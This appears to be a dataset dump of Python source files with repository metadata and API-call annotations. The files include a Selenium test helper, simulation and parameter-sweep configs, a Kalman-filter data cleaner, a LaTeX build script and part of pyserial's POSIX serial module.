repo_name
stringlengths
7
94
repo_path
stringlengths
4
237
repo_head_hexsha
stringlengths
40
40
content
stringlengths
10
680k
apis
stringlengths
2
840k
ankur-gupta91/block_storage
openstack_dashboard/test/integration_tests/regions/messages.py
938548a3d4507dc56c1c26b442767eb41aa2e610
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.common import by from openstack_dashboard.test.integration_tests.regions import baseregion ERROR = 'alert-danger' INFO = 'alert-info' SUCCESS = 'alert-success' class MessageRegion(baseregion.BaseRegion): _close_locator = (by.By.CSS_SELECTOR, 'a.close') def _msg_locator(self, level): return (by.By.CSS_SELECTOR, 'div.alert.%s' % level) def __init__(self, driver, conf, level=SUCCESS): self._default_src_locator = self._msg_locator(level) # NOTE(tsufiev): we cannot use self._turn_off_implicit_wait() at this # point, because the instance is not initialized by ancestor's __init__ driver.implicitly_wait(0) try: super(MessageRegion, self).__init__(driver, conf) except NoSuchElementException: self.src_elem = None finally: self._turn_on_implicit_wait() def exists(self): return self._is_element_displayed(self.src_elem) def close(self): self._get_element(*self._close_locator).click()
[]
bgarbin/GUIDE
model_input.py
06bca4e696b97ca14c11d74844d3b3ab7287f8f1
# -*- coding: utf-8 -*- import numpy as np #import cmath as cm # Main parameters for window # 'record_every': number of time_steps one between two consecutive record events window_params = {'kernel': 'RK4','nstep_update_plot': 100, 'step_size': 0.01, 'array_size': 10000, 'streaming': True, 'record_state':False, 'nstep_record':1, 'window_size':(1200,1000), 'invert_order_obs_var': True,'theme':'dark'} # Definition of the plot configuration def load_docks(): ''' Returns a dict to be used for plots declaration. Here, we use pyqtgraph docks. Each plot has a dictionnary as "value" with keys: "type" (accepted values: 'plot' and 'image'), "zoomOf" (key name of another dock), "position" (accepted values: 'bottom', 'top', 'left', 'right', 'above', or 'below'), "relativeTo" (optional, key name of another dock; position relative to another dock), size [(xlength,ylength); note that lengths arguments are only a suggestion; docks will still have to fill the entire dock area and obey the limits of their internal widgets], "labels" (dict of position:str), "title" (str). ''' docks = { 'plot1' : {'type': 'plot1D' , 'position': 'left' , 'size': (500,500), 'labels':{'bottom':'Time (arb. units)','left':'Intensity (arb. units)'}}, 'phase_space' : {'type': 'plot2D', 'position': 'right', 'size': (300,300)}, 'plot2' : {'type': 'plot1D' , 'zoomOf': 'plot1' , 'position': 'bottom', 'relativeTo': 'phase_space', 'size': (300,100)}, 'plot3' : {'type': 'plot1D', 'position': 'top','relativeTo':'phase_space', 'size': (300,300)}, 'custom_name' : {'type': 'image', 'position': 'above','relativeTo':'plot3', 'size': (300,300)}, } return docks def load_variables(): ''' Returns a dict of the variables. Each variable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is diff_eq_{variable_name}), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (False), "lineedit", "checkbox". ''' variables = { 'A' : {'type': np.complex128, 'init_cond': 0., 'plot': False, 'dock':['plot1','plot2'], 'help':'field in the first cavity'}, 'B' : {'type': np.complex128, 'init_cond': 0.001, 'plot': False, 'equation': diff_eq_B} } return variables def load_observables(): ''' Returns a dict of the observables. Similar to variables, observables are added internally to the dictionnary of variables. Each observable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is eq_{variable_name}), "calculation_size" (bool, whether you want according variable to be only the size of what calculation returns; WARNING: those items won't be stored), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (True), "lineedit", "checkbox". ''' observables = { 'mod_A' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':['plot1','plot2'], 'help':'modulus square of A'}, 'mod_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot1','plot2','plot3']}, 'mod_A_2' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':[{'phase_space':['mod_A_2','mod_B_2']}],'calculation_size':True, 'help':'abs(A)**2 shorter to be plotted in phase space'}, 'mod_B_2' : {'type': np.float64, 'init_cond': 0. ,'dock':[{'phase_space':['mod_B_2','mod_A_2']}],'calculation_size':True}, 'mod_A_2D' : {'type': np.float64, 'init_cond': 0. ,'dock':['custom_name'],'calculation_size':True,'help':'variable to be used plotted in image'}, #'ph_A' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']}, #'ph_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']} } return observables def load_params(): ''' Returns a dict of the parameters. Similarly to variables/observables, each parameter has a dictionnary as "value" with keys: "init_cond" (float), "min" (float), "max" (float), step (float or int; WARNING if int this parameter will be an integer), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "spinbox", "slider", "slider_conversion_factor". ''' params = {} params['delta'] = {'init_cond': -8., 'min': -10., 'max': 10., 'step': 0.01, 'help':'detuning parameter'} params['f'] = {'init_cond': 4.8, 'min': 0. , 'max': 20., 'step': 0.01} params['kappa'] = {'init_cond': 2.8, 'min': 0. , 'max': 10., 'step': 0.01} params['gamma'] = {'init_cond': 0. , 'min': -1. , 'max': 1., 'step': 0.01} params['tau'] = {'init_cond': 1. , 'min': 0. , 'max': 10., 'step': 0.01} params['npts_PS'] = {'init_cond': 1000 , 'min': 1 , 'max': 2000, 'step': 1} params['folding'] = {'init_cond': 100 , 'min': 1 , 'max': 1000, 'step': 1} params['min_scan'] = {'init_cond': 0, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'} params['max_scan'] = {'init_cond': 10, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'} params['step_scan'] = {'init_cond': 0.05, 'min': 0.001, 'max': 10., 'step': 0.001, 'help':'detuning parameter'} params['nstep_scan'] = {'init_cond': 50, 'min': 0, 'max': 500, 'step': 1, 'help':'detuning parameter'} return params # BEGIN Declaration of the equations. Automatically recognized pattern are "diff_eq_{variable}" (variables) and "eq_{observable}" (observables); with a name after the pattern that must match the variable/observable's one. Alternatively, you may use custom equation names. You should declare it in the variable/observable dictionnary with keyword "equation". def diff_eq_A(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['A'])**2)*variables['A'] - variables['A'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['B'] + params['f'] def diff_eq_B(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['B'])**2)*variables['B'] - variables['B'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['A'] + params['f'] def eq_mod_A(ui,variables,params): return abs(variables['A'])**2 def eq_mod_B(ui,variables,params): return abs(variables['B'])**2 def eq_mod_A_2(ui,variables,params): return variables['mod_A'][-params['npts_PS']:] def eq_mod_B_2(ui,variables,params): return variables['mod_B'][-params['npts_PS']:] def eq_mod_A_2D(ui,variables,params): folding = params['folding'] nb_rt = int(len(variables['mod_A'])/params['folding']) return np.reshape(variables['mod_A'][-(folding*nb_rt):],(nb_rt,folding)) #def eq_ph_A(variables,params): #return [cm.phase(temp) for temp in variables['A']] #np.array(np.arctan2(np.imag(variables['A']), np.real(variables['A']))) #def eq_ph_B(variables,params): #return [cm.phase(temp) for temp in variables['B']] def keyboard_keys(): """ Returns a dictionnary of user defined keys of form key:callable. System reserved keys: [" ", "q", "h", "s", "r", "i", "c"]. This must return an empty dict if no extra keys. """ keys = { 't': ramp_f, } return keys #return {} def ramp_f(ui,variables,params): print('begin scanning') for f in np.concatenate((np.arange(params['min_scan'],params['max_scan']+params['step_scan'],params['step_scan']),np.arange(params['max_scan'],params['min_scan']-params['step_scan'],-params['step_scan']))): f = round(f,2) ui.set_param('f',f) ui.run_simulator(params['nstep_scan']) print('end scanning') def kernel_my_own(variables,params): ''' Takes as arguments dicts of variables and params as {'key':value}. Returns a dict of the results with the same form. For now the function name must start with "kernel_" ''' pass
[((92, 11, 92, 76), 'numpy.reshape', 'np.reshape', ({(92, 22, 92, 59): "variables['mod_A'][-(folding * nb_rt):]", (92, 60, 92, 75): '(nb_rt, folding)'}, {}), "(variables['mod_A'][-(folding * nb_rt):], (nb_rt, folding))", True, 'import numpy as np\n'), ((112, 29, 112, 117), 'numpy.arange', 'np.arange', ({(112, 39, 112, 57): "params['min_scan']", (112, 58, 112, 96): "(params['max_scan'] + params['step_scan'])", (112, 97, 112, 116): "params['step_scan']"}, {}), "(params['min_scan'], params['max_scan'] + params['step_scan'],\n params['step_scan'])", True, 'import numpy as np\n'), ((112, 118, 112, 207), 'numpy.arange', 'np.arange', ({(112, 128, 112, 146): "params['max_scan']", (112, 147, 112, 185): "(params['min_scan'] - params['step_scan'])", (112, 186, 112, 206): "(-params['step_scan'])"}, {}), "(params['max_scan'], params['min_scan'] - params['step_scan'], -\n params['step_scan'])", True, 'import numpy as np\n')]
Harshavardhan-BV/Cancer-compe-strat
input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py
e4decacd5779e85a68c81d0ce3bedf42dea2964f
from multiprocessing import Pool import EnvEq as ee import numpy as np import itertools as it import os #parsing input into numpy arrays from input import * y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test]) p=np.array([p_o2,p_test]) mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]]) lam=np.array([lam_o2,lam_test]) t_D=np.array([t_DTpos,t_DTpro,t_DTneg]) r=np.array([r_Tpos,r_Tpro,r_Tneg]) delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg]) rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg]) lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64) #make directories for saving raw_outputs try: os.makedirs("../../raw_output/EnvEq/"+f_name) except: pass #iterator over these o2_lim_arr=np.empty([0,2]) for ulim_Tpro in np.arange(0.1,1,0.2): for ulim_Tneg in np.arange(0.1,1,0.2): o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0) def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1]) lim[0,1,1]=u_lim_o2[0] lim[0,2,1]=u_lim_o2[1] ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i) if __name__ == '__main__': pool = Pool(4) pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims pool.close() pool.join()
[((9, 3, 9, 52), 'numpy.array', 'np.array', ({(9, 12, 9, 51): '[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'}, {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])', True, 'import numpy as np\n'), ((10, 2, 10, 25), 'numpy.array', 'np.array', ({(10, 11, 10, 24): '[p_o2, p_test]'}, {}), '([p_o2, p_test])', True, 'import numpy as np\n'), ((11, 3, 11, 74), 'numpy.array', 'np.array', ({(11, 12, 11, 73): '[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'}, {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])', True, 'import numpy as np\n'), ((12, 4, 12, 31), 'numpy.array', 'np.array', ({(12, 13, 12, 30): '[lam_o2, lam_test]'}, {}), '([lam_o2, lam_test])', True, 'import numpy as np\n'), ((13, 4, 13, 39), 'numpy.array', 'np.array', ({(13, 13, 13, 38): '[t_DTpos, t_DTpro, t_DTneg]'}, {}), '([t_DTpos, t_DTpro, t_DTneg])', True, 'import numpy as np\n'), ((14, 2, 14, 34), 'numpy.array', 'np.array', ({(14, 11, 14, 33): '[r_Tpos, r_Tpro, r_Tneg]'}, {}), '([r_Tpos, r_Tpro, r_Tneg])', True, 'import numpy as np\n'), ((15, 6, 15, 50), 'numpy.array', 'np.array', ({(15, 15, 15, 49): '[delta_Tpos, delta_Tpro, delta_Tneg]'}, {}), '([delta_Tpos, delta_Tpro, delta_Tneg])', True, 'import numpy as np\n'), ((16, 4, 16, 42), 'numpy.array', 'np.array', ({(16, 13, 16, 41): '[rho_Tpos, rho_Tpro, rho_Tneg]'}, {}), '([rho_Tpos, rho_Tpro, rho_Tneg])', True, 'import numpy as np\n'), ((17, 4, 17, 190), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((26, 11, 26, 26), 'numpy.empty', 'np.empty', ({(26, 20, 26, 25): '[0, 2]'}, {}), '([0, 2])', True, 'import numpy as np\n'), ((27, 17, 27, 37), 'numpy.arange', 'np.arange', ({(27, 27, 27, 30): '(0.1)', (27, 31, 27, 32): '(1)', (27, 33, 27, 36): '(0.2)'}, {}), '(0.1, 1, 0.2)', True, 'import numpy as np\n'), ((21, 4, 21, 49), 'os.makedirs', 'os.makedirs', ({(21, 16, 21, 48): "('../../raw_output/EnvEq/' + f_name)"}, {}), "('../../raw_output/EnvEq/' + f_name)", False, 'import os\n'), ((28, 21, 28, 41), 'numpy.arange', 'np.arange', ({(28, 31, 28, 34): '(0.1)', (28, 35, 28, 36): '(1)', (28, 37, 28, 40): '(0.2)'}, {}), '(0.1, 1, 0.2)', True, 'import numpy as np\n'), ((36, 4, 36, 64), 'EnvEq.solve_eq', 'ee.solve_eq', ({(36, 16, 36, 21): 't_max', (36, 22, 36, 24): 'dt', (36, 25, 36, 27): 'y0', (36, 28, 36, 29): 'p', (36, 30, 36, 32): 'mu', (36, 33, 36, 36): 'lam', (36, 37, 36, 38): 'r', (36, 39, 36, 40): 'K', (36, 41, 36, 46): 'delta', (36, 47, 36, 50): 'rho', (36, 51, 36, 54): 'lim', (36, 55, 36, 63): 'f_name_i'}, {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)', True, 'import EnvEq as ee\n'), ((39, 11, 39, 18), 'multiprocessing.Pool', 'Pool', ({(39, 16, 39, 17): '4'}, {}), '(4)', False, 'from multiprocessing import Pool\n'), ((29, 19, 29, 71), 'numpy.append', 'np.append', (), '', True, 'import numpy as np\n')]
1985312383/contest
task1_makeTrainingDataset.py
c4734647ad436cf5884075f906a3e9f10fc4dcfa
import csv import re import numpy as np thre = 1.5 # 要调整的参数,这个是阈值 iteration_num = 2 # 要调整的参数,这个是迭代次数 def KalmanFilter(z, n_iter=20): # 卡尔曼滤波 # 这里是假设A=1,H=1的情况 # intial parameters sz = (n_iter,) # size of array # Q = 1e-5 # process variance Q = 1e-6 # process variance # allocate space for arrays xhat = np.zeros(sz) # a posteri estimate of x P = np.zeros(sz) # a posteri error estimate xhatminus = np.zeros(sz) # a priori estimate of x Pminus = np.zeros(sz) # a priori error estimate K = np.zeros(sz) # gain or blending factor R = 0.015 ** 2 # estimate of measurement variance, change to see effect # intial guesses xhat[0] = 0.0 P[0] = 1.0 A = 1 H = 1 for k in range(1, n_iter): # time update xhatminus[k] = A * xhat[k - 1] # X(k|k-1) = AX(k-1|k-1) + BU(k) + W(k),A=1,BU(k) = 0 Pminus[k] = A * P[k - 1] + Q # P(k|k-1) = AP(k-1|k-1)A' + Q(k) ,A=1 # measurement update K[k] = Pminus[k] / (Pminus[k] + R) # Kg(k)=P(k|k-1)H'/[HP(k|k-1)H' + R],H=1 xhat[k] = xhatminus[k] + K[k] * (z[k] - H * xhatminus[k]) # X(k|k) = X(k|k-1) + Kg(k)[Z(k) - HX(k|k-1)], H=1 P[k] = (1 - K[k] * H) * Pminus[k] # P(k|k) = (1 - Kg(k)H)P(k|k-1), H=1 return xhat def data_process(file_path: str): with open(file_path, "r") as f: # 打开文件 f.readline() # 去掉第一行 data = f.readlines() # 读取文件 data_num = len(data) / 4 if int(data_num) - data_num < -0.1: raise ValueError("数据数量不对!") initial_time = re.search(":.*:([0-9]*)", data[0], flags=0) # 获取初始数据序列 initial_time = int(initial_time.group(1)) Measures = [] for i in range(int(data_num)): measure = [] for j in range(4): device = [] anchor = re.search(":[0-9]*?:RR:0:([0-9]):[0-9]*?:([0-9]*?):[0-9]*?:([0-9]*)", data[4 * i + j], flags=0) device.extend([int(anchor.group(3)) - initial_time, anchor.group(1), anchor.group(2)]) # 获取数据序号、设备号、测量值 device = list(map(int, device)) measure.append(device) # 一个measure就是四个设备拿到的四份数据 Measures.append(measure) Measures = np.array(Measures) # Measures是三维数组是获取的所有测量数据 normalized_device_data = [] normalized_device_data_x = [] device_data = [] device_data_x = [] for i in range(4): device_data.append(Measures[:, i, 2]) device_data_x.append(np.arange(len(Measures[:, i, 2]))) normalized_device_data.append(device_data[i] / np.max(Measures[:, i, 2])) # 最大值归一化 normalized_device_data_x = device_data_x normalized_device_data = np.array(normalized_device_data) normalized_device_data_x = np.array(normalized_device_data_x) device_data = np.array(device_data) device_data_x = np.array(device_data_x) processed_device_data = np.array(device_data).copy() device_mean = np.mean(device_data, axis=1) device_std = np.std(device_data, axis=1) low_thre = device_mean - device_std * thre # 去除离群点 high_thre = device_mean + device_std * thre # 去除离群点 for _ in range(iteration_num): for i in range(4): for j in range(len(device_data[i, :])): if device_data[i, j] < low_thre[i] or device_data[i, j] > high_thre[i]: processed_device_data[i, j] = device_mean[i] xhat = [] for i in range(4): # raw_data = device_data[i] raw_data = processed_device_data[i] xhat.append(KalmanFilter(raw_data, n_iter=len(raw_data))) xhat = np.array(xhat) xhat = np.around(xhat, 1) # 将滤波后的四组坐标值,保留一位小数 return device_data, xhat # device_data为原始数据,xhat是离群点去除且卡尔曼滤波后的数据 def save_data(file_path: str, Measures): with open(file_path, "w+", newline="") as datacsv: # dialect为打开csv文件的方式,默认是excel,delimiter="\t"参数指写入的时候的分隔符 csvwriter = csv.writer(datacsv, dialect=("excel")) # csv文件插入一行数据,把下面列表中的每一项放入一个单元格(可以用循环插入多行) csvwriter.writerow(["Number", "A0", "A1", "A2", "A3"]) csvwriter.writerows(np.column_stack((np.arange(Measures.shape[1]), Measures.T)), ) def collect_dataset(kind): for i in range(1, 325): file_path = f"./data/附件1:UWB数据集/{kind}数据/{i}.{kind}.txt" original_data, final_processed_data = data_process(file_path) save_data(f"cleaned_data/{kind}数据/{i}.{kind}.csv", final_processed_data) def collect_labels(): pass if __name__ == '__main__': collect_dataset("正常") collect_dataset("异常")
[((18, 11, 18, 23), 'numpy.zeros', 'np.zeros', ({(18, 20, 18, 22): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((19, 8, 19, 20), 'numpy.zeros', 'np.zeros', ({(19, 17, 19, 19): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((20, 16, 20, 28), 'numpy.zeros', 'np.zeros', ({(20, 25, 20, 27): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((21, 13, 21, 25), 'numpy.zeros', 'np.zeros', ({(21, 22, 21, 24): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((22, 8, 22, 20), 'numpy.zeros', 'np.zeros', ({(22, 17, 22, 19): 'sz'}, {}), '(sz)', True, 'import numpy as np\n'), ((53, 19, 53, 62), 're.search', 're.search', (), '', False, 'import re\n'), ((66, 15, 66, 33), 'numpy.array', 'np.array', ({(66, 24, 66, 32): 'Measures'}, {}), '(Measures)', True, 'import numpy as np\n'), ((77, 29, 77, 61), 'numpy.array', 'np.array', ({(77, 38, 77, 60): 'normalized_device_data'}, {}), '(normalized_device_data)', True, 'import numpy as np\n'), ((78, 31, 78, 65), 'numpy.array', 'np.array', ({(78, 40, 78, 64): 'normalized_device_data_x'}, {}), '(normalized_device_data_x)', True, 'import numpy as np\n'), ((79, 18, 79, 39), 'numpy.array', 'np.array', ({(79, 27, 79, 38): 'device_data'}, {}), '(device_data)', True, 'import numpy as np\n'), ((80, 20, 80, 43), 'numpy.array', 'np.array', ({(80, 29, 80, 42): 'device_data_x'}, {}), '(device_data_x)', True, 'import numpy as np\n'), ((82, 18, 82, 46), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((83, 17, 83, 44), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((98, 11, 98, 25), 'numpy.array', 'np.array', ({(98, 20, 98, 24): 'xhat'}, {}), '(xhat)', True, 'import numpy as np\n'), ((99, 11, 99, 29), 'numpy.around', 'np.around', ({(99, 21, 99, 25): 'xhat', (99, 27, 99, 28): '1'}, {}), '(xhat, 1)', True, 'import numpy as np\n'), ((106, 20, 106, 58), 'csv.writer', 'csv.writer', (), '', False, 'import csv\n'), ((61, 21, 61, 116), 're.search', 're.search', (), '', False, 'import re\n'), ((81, 28, 81, 49), 'numpy.array', 'np.array', ({(81, 37, 81, 48): 'device_data'}, {}), '(device_data)', True, 'import numpy as np\n'), ((75, 55, 75, 80), 'numpy.max', 'np.max', ({(75, 62, 75, 79): 'Measures[:, (i), (2)]'}, {}), '(Measures[:, (i), (2)])', True, 'import numpy as np\n'), ((109, 45, 109, 73), 'numpy.arange', 'np.arange', ({(109, 55, 109, 72): 'Measures.shape[1]'}, {}), '(Measures.shape[1])', True, 'import numpy as np\n')]
marcinguy/checkmate-ce
checkmate/contrib/plugins/all/progpilot/setup.py
fc33c7c27bc640ab4db5dbda274a0edd3b3db218
from .analyzer import ProgpilotAnalyzer from .issues_data import issues_data analyzers = { 'phpanlyzer' : { 'name' : 'phpanalyzer', 'title' : 'phpanalyzer', 'class' : ProgpilotAnalyzer, 'language' : 'all', 'issues_data' : issues_data, }, }
[]
truckli/technotes
genlist.py
11d3cc0a1bd33141a22eaa2247cac1be1d74718a
#!/usr/bin/env python import shutil, re, os, sys file_model = "Model.template" bookname = "TechNotes" file_bibtex = "thebib.bib" folder_target = "../pdf/" #if name is a chapter, return its sections def get_sections(name): if not os.path.isdir(name): return [] files = os.listdir(name) sections = [] for section in files: if re.match('.*\.tex$', section) and not re.match(".*lmz0610.*", section): sections.append(name + "/" + section) return sections def is_updated(pdffile, texfiles): def depend_modified(fname, ims): depend_mtime = os.path.getmtime(fname) if depend_mtime > ims: print pdffile, ' mtime: ',ims print fname, ' mtime: ', depend_mtime return True return False old_pdffile = folder_target + pdffile if not os.path.isfile(old_pdffile): return False pdf_mtime = os.path.getmtime(old_pdffile) #if depend_modified(sys.argv[0], pdf_mtime): #return False #if depend_modified(file_model, pdf_mtime): #return False for section in texfiles: if depend_modified(section, pdf_mtime): return False return True def remove_tmp(tmpname): if os.path.isfile(tmpname): os.remove(tmpname) def remove_latex_tmps(texname): remove_tmp(texname + ".pdf") remove_tmp(texname + ".tex") remove_tmp(texname + ".blg") remove_tmp(texname + ".bbl") remove_tmp(texname + ".out") remove_tmp(texname + ".toc") remove_tmp(texname + ".aux") remove_tmp(texname + ".idx") remove_tmp(texname + ".log") remove_tmp(texname + ".lof") remove_tmp(texname + ".lot") def read_bbl_file(object_name): file_bbl = object_name + ".bbl" if not os.path.isfile(file_bbl): return "" with open(file_bbl, 'r') as f: return f.read() #if depend_files contains citation def need_bibtex(object_name, depend_files): #if a file contains latex citation command \cite{} def contain_citation(section_name): with open(section_name, "r") as f: content_section = f.read() if content_section.find("\\cite{") == -1: return False return True for section in depend_files: if contain_citation(section): return True return False def gen_pdf(object_name): object_pdf = object_name + ".pdf" if object_name == bookname: depend_files = book_sections targets = [folder_target + object_pdf, folder_target + "AAAAAAAAAAA.pdf"] chapter_start_counter = 0 else: depend_files = chap_sections[object_name] targets = [folder_target + object_pdf] chapter_start_counter = book_chapters.index(object_name) # if is_updated(object_pdf, depend_files): # print(object_pdf + " is updated") # return False obj_need_bibtex = need_bibtex(object_name, depend_files) model = '' with open(file_model) as model_file: model = model_file.read() model = model.replace("OBJECTNAME", object_name) if object_name == 'Report': model = model.replace("CHAPTERSTART", "0") model = model.replace("\\tableofcontents", "%\\tableofcontents") model = model.replace("ctexrep", "ctexart") model = model.replace("\\setcounter{chapter}", "%\\setcounter{chapter}") else: model = model.replace("CHAPTERSTART", str(chapter_start_counter)) insert_word = "TOADD" insert_pos = model.find(insert_word) latex_text = model[:insert_pos] + insert_word for section in depend_files: latex_text = latex_text + "\n\\input{"+ section + "}" #prepend text encoding mode line section_text = "" with open(section, 'r') as f: line = f.readline() if line[:6] != '%!Mode': section_text = '%!Mode:: "TeX:UTF-8"\n' + line + f.read() if section_text != "": with open(section, 'w') as f: f.write(section_text) if obj_need_bibtex: latex_text = latex_text + "\n\n" latex_text = latex_text + "\\bibliographystyle{unsrt}\n" latex_text = latex_text + "\\bibliography{thebib}\n" latex_text = latex_text + model[insert_pos+len(insert_word):] object_tex = object_name + ".tex" with open(object_tex, "w") as f: f.write(latex_text) # os.system("xelatex " + object_name) # if len(sys.argv) < 3 or sys.argv[2] != "fast": # if obj_need_bibtex: # old_bbl = read_bbl_file(object_name) # os.system("bibtex " + object_name) # if old_bbl != read_bbl_file(object_name): # os.system("xelatex " + object_name) # os.system("xelatex " + object_name) # # if os.path.isfile(object_pdf): # for target in targets: # shutil.copy(object_pdf, target) return True #trim trailing slash def trim_chap_name(name): if name[len(name) - 1] == '/': name = name[:len(name)-1] return name def merge_chapter_pdfs(): mergecmd = 'pdftk ' for chap in book_chapters: chappdf = folder_target + chap + '.pdf' if os.path.isfile(chappdf): mergecmd += chappdf + ' ' mergecmd += 'cat output ' + folder_target + 'AAABBBBBBBB.pdf' print mergecmd os.system(mergecmd) ################################################## #now work starts files = os.listdir('.') chap_sections = {} book_sections = [] book_chapters = [] for chap in files: sections = get_sections(chap) if len(sections): chap_sections[chap] = sections book_sections.extend(sections) book_chapters.append(chap) cmd = "one" if cmd == "one": gen_pdf(bookname) elif cmd == "all": modified = False for chap in chap_sections: modified = gen_pdf(chap) or modified if modified: merge_chapter_pdfs() elif cmd == "clean": for chap in chap_sections: remove_latex_tmps(chap) remove_latex_tmps(bookname) else: chap = trim_chap_name(cmd) if chap in book_sections: #chap is actually a section section = chap chap = 'Report' chap_sections[chap] = [section] book_chapters.append(chap) if not chap_sections.has_key(chap): print(chap + " is not a valid chapter name") sys.exit(1) modified = gen_pdf(chap) if modified and chap != 'Report': merge_chapter_pdfs()
[]
mattl1598/testing
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py
cd8124773b83a07301c507ffbb9ccaafbfe7a274
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 Chris Liechti <[email protected]> # this is distributed under a free software license, see license.txt # # parts based on code from Grant B. Edwards <[email protected]>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from .serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port ASYNC_SPD_MASK = 0x1030 ASYNC_SPD_CUST = 0x0030 def set_special_baudrate(port, baudrate): import array buf = array.array('i', [0] * 32) # get serial_struct FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf) # set custom divisor buf[6] = buf[7] / baudrate # update flags buf[4] &= ~ASYNC_SPD_MASK buf[4] |= ASYNC_SPD_CUST # set serial_struct try: res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf) except IOError: raise ValueError('Failed to set custom baud rate: %r' % baudrate) baudrate_constants = { 0: 0000000, # hang up 50: 0o000001, 75: 0o000002, 110: 0o000003, 134: 0o000004, 150: 0o000005, 200: 0o000006, 300: 0o000007, 600: 0o000010, 1200: 0o000011, 1800: 0o000012, 2400: 0o000013, 4800: 0o000014, 9600: 0o000015, 19200: 0o000016, 38400: 0o000017, 57600: 0o010001, 115200: 0o010002, 230400: 0o010003, 460800: 0o010004, 500000: 0o010005, 576000: 0o010006, 921600: 0o010007, 1000000: 0o010010, 1152000: 0o010011, 1500000: 0o010012, 2000000: 0o010013, 2500000: 0o010014, 3000000: 0o010015, 3500000: 0o010016, 4000000: 0o010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat == 'openbsd3': # BSD (confirmed) def device(port): return '/dev/ttyp%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd' or \ plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d) def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 